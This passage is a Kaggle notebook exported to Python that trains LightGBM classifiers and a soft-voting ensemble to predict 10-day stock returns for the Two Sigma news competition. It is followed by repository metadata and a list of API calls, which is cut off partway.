data_scaler.fit_transform(market_train_df[num_columns])\n\n# In[ ]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nmarket_train_df = market_train_df.reset_index()\nmarket_train_df = market_train_df.drop(columns='index')\n\n# Random train-test split\ntrain_indices, val_indices = train_test_split(market_train_df.index.values,test_size=0.1, random_state=92)\n\n# In[ ]:\n\n\n# Extract X and Y\ndef get_input(market_train, indices):\n X = market_train.loc[indices, feature_columns].values\n y = market_train.loc[indices,'returnsOpenNextMktres10'].map(lambda x: 0 if x<0 else 1).values\n #y = market_train.loc[indices,'returnsOpenNextMktres10'].map(lambda x: convert_to_class(x)).values\n r = market_train.loc[indices,'returnsOpenNextMktres10'].values\n u = market_train.loc[indices, 'universe']\n d = market_train.loc[indices, 'date']\n return X,y,r,u,d\n\n# r, u and d are used to calculate the scoring metric\nX_train,y_train,r_train,u_train,d_train = get_input(market_train_df, train_indices)\nX_val,y_val,r_val,u_val,d_val = get_input(market_train_df, val_indices)\n\n# \n# \n# ## Building model\n# \n# Here we use lightgbm classifier as our model\n# \n# ### Parameters tuning\n\n# In[ ]:\n\n\n# Set up decay learning rate\ndef learning_rate_power(current_round):\n base_learning_rate = 0.19000424246380565\n min_learning_rate = 0.01\n lr = base_learning_rate * np.power(0.995,current_round)\n return max(lr, min_learning_rate)\n\n# In[ ]:\n\n\nfrom scipy.stats import randint as sp_randint\nfrom scipy.stats import uniform as sp_uniform\n\ntune_params = {'n_estimators': [200,500,1000,2500,5000],\n 'max_depth': sp_randint(4,12),\n 'colsample_bytree':sp_uniform(loc=0.8, scale=0.15),\n 'min_child_samples':sp_randint(60,120),\n 'subsample': sp_uniform(loc=0.75, scale=0.25),\n 'reg_lambda':[1e-3, 1e-2, 1e-1, 1]}\n\nfit_params = {'early_stopping_rounds':40,\n 'eval_metric': 'accuracy',\n 'eval_set': [(X_train, y_train), (X_val, y_val)],\n 'verbose': 20,\n 'callbacks': [lgb.reset_parameter(learning_rate=learning_rate_power)]}\n\n# In[ ]:\n\n\nlgb_clf = lgb.LGBMClassifier(n_jobs=4, objective='binary',random_state=1)\ngs = RandomizedSearchCV(estimator=lgb_clf, \n param_distributions=tune_params, \n n_iter=40,\n scoring='f1',\n cv=5,\n refit=True,\n random_state=1,\n verbose=True)\n\n# Running the parameters search will take another 3 hours, so we will straight away use the best parameters \n\n# In[ ]:\n\n\nlgb_clf = lgb.LGBMClassifier(n_jobs=4,\n objective='multiclass',\n random_state=100)\nopt_params = {'n_estimators':500,\n 'boosting_type': 'dart',\n 'objective': 'binary',\n 'num_leaves':2452,\n 'min_child_samples':212,\n 'reg_lambda':0.01}\nlgb_clf.set_params(**opt_params)\nlgb_clf.fit(X_train, y_train,**fit_params)\n\n# In[ ]:\n\n\nprint('Training accuracy: ', accuracy_score(y_train, lgb_clf.predict(X_train)))\nprint('Validation accuracy: ', accuracy_score(y_val, lgb_clf.predict(X_val)))\n\n# \n# \n# ### Visualizing the result\n\n# In[ ]:\n\n\nfeatures_imp = pd.DataFrame()\nfeatures_imp['features'] = list(feature_columns)[:]\nfeatures_imp['importance'] = lgb_clf.feature_importances_\nfeatures_imp = features_imp.sort_values(by='importance', ascending=False).reset_index()\n\ny_plot = -np.arange(15)\nplt.figure(figsize=(10,6))\nplt.barh(y_plot, features_imp.loc[:14,'importance'].values)\nplt.yticks(y_plot,(features_imp.loc[:14,'features']))\nplt.xlabel('Feature importance')\nplt.title('Features importance')\nplt.tight_layout()\n\n# In[ ]:\n\n\n# Rescale confidence\ndef rescale(data_in, data_ref):\n scaler_ref = StandardScaler()\n scaler_ref.fit(data_ref.reshape(-1,1))\n scaler_in = StandardScaler()\n data_in = scaler_in.fit_transform(data_in.reshape(-1,1))\n data_in = scaler_ref.inverse_transform(data_in)[:,0]\n return data_in\n\n# In[ ]:\n\n\ndef confidence_out(y_pred):\n confidence = np.zeros(y_pred.shape[0])\n for i in range(len(confidence)):\n if y_pred[i,:].argmax() != 1:\n confidence[i] = y_pred[i,2]-y_pred[i,0]\n return confidence\n\n# In[ ]:\n\n\ny_pred_proba = lgb_clf.predict_proba(X_val)\npredicted_return = y_pred_proba[:,1] - y_pred_proba[:,0]\n#predicted_return = confidence_out(y_pred_proba)\npredicted_return = rescale(predicted_return, r_train)\n\n# In[ ]:\n\n\n# distribution of confidence that will be used as submission\nplt.hist(predicted_return, bins='auto', label='Predicted confidence')\nplt.hist(r_val, bins='auto',alpha=0.8, label='True market return')\nplt.title(\"predicted confidence\")\nplt.legend(loc='best')\nplt.xlim(-1,1)\nplt.show()\n\n# In[ ]:\n\n\n# calculation of actual metric that is used to calculate final score\nr_val = r_val.clip(-1,1) # get rid of outliers.\nx_t_i = predicted_return * r_val * u_val\ndata = {'day' : d_val, 'x_t_i' : x_t_i}\ndf = pd.DataFrame(data)\nx_t = df.groupby('day').sum().values.flatten()\nmean = np.mean(x_t)\nstd = np.std(x_t)\nscore_valid = mean / std\nprint('Validation score', score_valid)\n\n# \n# ### Voting ensemble\n# Now we construct an ensemble of multiple classifier and use soft voting to get the final result\n\n# In[ ]:\n\n\n# This code is inspired from this kernel: https://www.kaggle.com/skooch/lgbm-w-random-split-2\nclfs = []\nfor i in range(20):\n clf = lgb.LGBMClassifier(learning_rate=0.1, random_state=1200+i, silent=True,\n n_jobs=4, n_estimators=2500)\n clf.set_params(**opt_params)\n clfs.append(('lgbm%i'%i, clf))\n\ndef split_data(X, y, test_percentage=0.2, seed=None):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_percentage)\n return X_train, y_train, X_test, y_test \n\ndef _parallel_fit_estimator(estimator, X, y, sample_weight=None, **fit_params):\n \n # randomly split the data so we have a test set for early stopping\n X_train, y_train, X_test, y_test = split_data(X, y, seed=1992)\n \n # update the fit params with our new split\n fit_params[\"eval_set\"] = [(X_train,y_train), (X_test,y_test)]\n \n # fit the estimator\n if sample_weight is not None:\n estimator.fit(X_train, y_train, sample_weight=sample_weight, **fit_params)\n else:\n estimator.fit(X_train, y_train, **fit_params)\n return estimator\n\n# In[ ]:\n\n\nclass VotingClassifierLGBM(VotingClassifier):\n '''\n This implements the fit method of the VotingClassifier propagating fit_params\n '''\n def fit(self, X, y, sample_weight=None, **fit_params):\n \n if isinstance(y, np.ndarray) and len(y.shape) > 1 and y.shape[1] > 1:\n raise NotImplementedError('Multilabel and multi-output'\n ' classification is not supported.')\n\n if self.voting not in ('soft', 'hard'):\n raise ValueError(\"Voting must be 'soft' or 'hard'; got (voting=%r)\"\n % self.voting)\n\n if self.estimators is None or len(self.estimators) == 0:\n raise AttributeError('Invalid `estimators` attribute, `estimators`'\n ' should be a list of (string, estimator)'\n ' tuples')\n\n if (self.weights is not None and\n len(self.weights) != len(self.estimators)):\n raise ValueError('Number of classifiers and weights must be equal'\n '; got %d weights, %d estimators'\n % (len(self.weights), len(self.estimators)))\n\n if sample_weight is not None:\n for name, step in self.estimators:\n if not has_fit_parameter(step, 'sample_weight'):\n raise ValueError('Underlying estimator \\'%s\\' does not'\n ' support sample weights.' % name)\n names, clfs = zip(*self.estimators)\n self._validate_names(names)\n\n n_isnone = np.sum([clf is None for _, clf in self.estimators])\n if n_isnone == len(self.estimators):\n raise ValueError('All estimators are None. At least one is '\n 'required to be a classifier!')\n\n self.le_ = LabelEncoder().fit(y)\n self.classes_ = self.le_.classes_\n self.estimators_ = []\n\n transformed_y = self.le_.transform(y)\n\n self.estimators_ = Parallel(n_jobs=self.n_jobs)(\n delayed(_parallel_fit_estimator)(clone(clf), X, transformed_y,\n sample_weight=sample_weight, **fit_params)\n for clf in clfs if clf is not None)\n\n return self\n\n# In[ ]:\n\n\nvc = VotingClassifierLGBM(clfs, voting='soft')\nvc.fit(X_train, y_train, **fit_params)\nfilename = 'VotingClassifierLGBM.sav'\npickle.dump(vc, open(filename, 'wb'))\n\n# In[ ]:\n\n\nvc = pickle.load(open(filename, 'rb'))\nvc.voting = 'soft'\npredicted_class = vc.predict(X_val)\npredicted_return = vc.predict_proba(X_val)\n#predicted_return = confidence_out(predicted_return)\npredicted_return = vc.predict_proba(X_val)[:,1]*2-1\npredicted_return = rescale(predicted_return, r_train)\n\n# In[ ]:\n\n\nplt.hist(predicted_class, bins='auto')\n\n# In[ ]:\n\n\nvc.voting = 'soft'\nglobal_accuracy_soft = accuracy_score(y_val, predicted_class)\nglobal_f1_soft = f1_score(y_val, predicted_class)\nprint('Accuracy score clfs: %f' % global_accuracy_soft)\nprint('F1 score clfs: %f' % global_f1_soft)\n\n# In[ ]:\n\n\n# distribution of confidence that will be used as submission\nplt.hist(predicted_return, bins='auto', label='Prediciton')\nplt.hist(r_val, bins='auto',alpha=0.8, label='True data')\nplt.title(\"predicted confidence\")\nplt.legend(loc='best')\nplt.xlim(-1,1)\nplt.show()\n\n# In[ ]:\n\n\n# calculation of actual metric that is used to calculate final score\nr_val = r_val.clip(-1,1) # get rid of outliers. Where do they come from??\nx_t_i = predicted_return * r_val * u_val\ndata = {'day' : d_val, 'x_t_i' : x_t_i}\ndf = pd.DataFrame(data)\nx_t = df.groupby('day').sum().values.flatten()\nmean = np.mean(x_t)\nstd = np.std(x_t)\nscore_valid = mean / std\nprint('Validation score', score_valid)\n\n# \n# ## Making submission\n\n# In[ ]:\n\n\ndays = env.get_prediction_days()\nn_days = 0\nprep_time = 0\nprediction_time = 0\npackaging_time = 0\nfor (market_obs_df, news_obs_df, predictions_template_df) in days:\n n_days +=1\n if n_days % 50 == 0:\n print(n_days,end=' ')\n\n t = time.time()\n column_market = ['returnsClosePrevMktres1','returnsOpenPrevMktres1','returnsClosePrevMktres10', 'returnsOpenPrevMktres10']\n column_raw = ['returnsClosePrevRaw1', 'returnsOpenPrevRaw1','returnsClosePrevRaw10', 'returnsOpenPrevRaw10']\n market_obs_df['close_open_ratio'] = np.abs(market_obs_df['close']/market_obs_df['open'])\n for i in range(len(column_raw)):\n market_obs_df[column_market[i]] = market_obs_df[column_market[i]].fillna(market_obs_df[column_raw[i]])\n\n market_obs_df = market_obs_df[market_obs_df.assetCode.isin(predictions_template_df.assetCode)]\n market_obs_df = market_obs_df[market_obs_df.assetCode.isin(asset_code_dict.keys())]\n market_obs = data_prep(market_obs_df, news_obs_df)\n market_obs[num_columns] = data_scaler.transform(market_obs[num_columns])\n X_live = market_obs[feature_columns].values\n prep_time += time.time() - t\n\n t = time.time()\n lp = vc.predict_proba(X_live)\n prediction_time += time.time() -t\n\n t = time.time()\n confidence = lp[:,1] - lp[:,0]\n #confidence = confidence_out(lp)\n confidence = rescale(confidence, r_train)\n preds = pd.DataFrame({'assetCode':market_obs['assetCode'],'confidence':confidence})\n predictions_template_df = predictions_template_df.merge(preds,how='left').drop('confidenceValue',axis=1).fillna(0).rename(columns={'confidence':'confidenceValue'})\n env.predict(predictions_template_df)\n packaging_time += time.time() - t\n\nenv.write_submission_file()\n\n# In[ ]:\n\n\nplt.hist(confidence, bins='auto')\nplt.title(\"predicted confidence\")\nplt.show()\n\n# This concludes my work for this problem. Please let me know if you have any suggestion. Thank you\n\n# \n", "repo_name": "tetherless-world/CodeGraph", "sub_path": "kaggle/python_files/sample166.py", "file_name": "sample166.py", "file_ext": "py", "file_size_in_byte": 41922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.rcParams", "line_number": 31, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 32, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 61, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 62, "usage_type": "attribute"}, {"api_name": "kaggle.competitions.twosigmanews.make_env", "line_number": 69, "usage_type": "call"}, {"api_name": "kaggle.competitions.twosigmanews", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 230, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 231, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 262, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 262, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 277, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 322, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 322, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 323, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 323, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 337, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 338, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 338, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 347, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 362, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 369, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 369, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 370, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 370, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 371, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 371, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 372, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 372, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 373, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 373, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 383, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 383, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 385, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 391, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 391, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 406, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 406, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 407, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 407, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 408, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 451, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 490, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 490, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 499, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 499, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 500, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 500, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 501, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 501, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 502, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 502, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 509, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 509, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 510, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 511, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 511, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 521, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 521, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 522, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 523, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 523, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 524, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 524, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 525, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 525, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 532, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 532, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 533, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 533, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 534, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 535, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 543, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 543, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 544, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 544, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 545, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 545, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 546, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 546, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 547, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 547, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 556, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 556, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 557, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 605, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 605, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 606, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 606, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 607, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 607, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 608, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 608, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 615, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 615, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 616, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 616, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 617, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 617, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 626, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 626, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 627, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 627, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 628, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 628, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 629, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 629, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 657, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 657, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 658, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 658, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 659, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 660, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 660, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 675, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 675, "usage_type": "name"}, {"api_name": 